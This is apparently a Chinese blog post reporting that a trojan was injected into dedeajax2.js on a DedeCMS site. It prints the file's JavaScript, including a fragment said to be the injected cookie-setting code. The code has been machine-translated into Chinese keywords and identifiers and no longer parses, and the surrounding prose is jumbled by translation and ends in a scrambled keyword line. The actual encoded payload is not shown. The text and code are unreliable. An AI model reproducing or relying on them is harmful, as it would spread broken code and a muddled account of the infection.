点评:我的一个
网站被植入木马,dede的
程序。我
升级到IE7补丁,为了
检查马做准备
工作,哈哈,原来dedeajax2.js植入木马
我的一个网站被植入木马,dede的程序。我升级到IE7补丁,为了检查马做准备工作,哈哈,
发现dedeajax2.js植入木马的源代码如下:
/ /初始化
文档 功能initxdom(){
如果(dedexdom!= null)返回;
var obj = null;
如果(typeof(domparser)!=未定义)
VaR解析器=新DOMParser();
obj = parser.parsefromstring(XMLTEXT,
文本 / XML);
{其他}
尝试{ obj =新的ActiveX对象(MSXML2. DOMDocument );} catch(e){ }
如果(obj = = null){ try obj =新的ActiveX对象(微软。XMLDOM );抓(e){ } }
}
dedexdom = obj;
};
以下是 /被植入木马
病毒,
都是乱码通过Unicode编码
处理。现在的人越来越狡猾
如果(document.cookie.indexof(你好)= = 1){ var到期=新的
日期();expires.settime(expires.gettime()24×60×60×1000);文档。饼干=你好=是的;文档。饼干=你好=是的;expires.settime;(}(});}
它可以覆盖着dedeajax2原始版本。这个
文件,dede模板使用,
搜索,没有发现使用。
但是,建议您多关注dedecms官方补丁。UNIX
服务器不能将所有的文件,虽然Dede在UNIX服务器太麻烦。
关键词描述:如果新的木马 / /零var obj的植入